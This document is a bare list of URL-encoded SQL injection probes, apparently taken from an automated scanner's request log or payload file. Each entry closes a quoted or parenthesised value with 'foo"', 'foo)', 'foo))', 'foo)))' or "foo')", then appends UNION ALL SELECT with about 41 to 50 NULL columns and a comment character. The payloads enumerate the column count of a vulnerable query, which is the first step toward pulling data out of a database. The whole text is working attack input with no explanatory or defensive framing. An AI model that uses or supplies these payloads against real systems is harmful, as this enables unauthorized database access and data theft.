foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 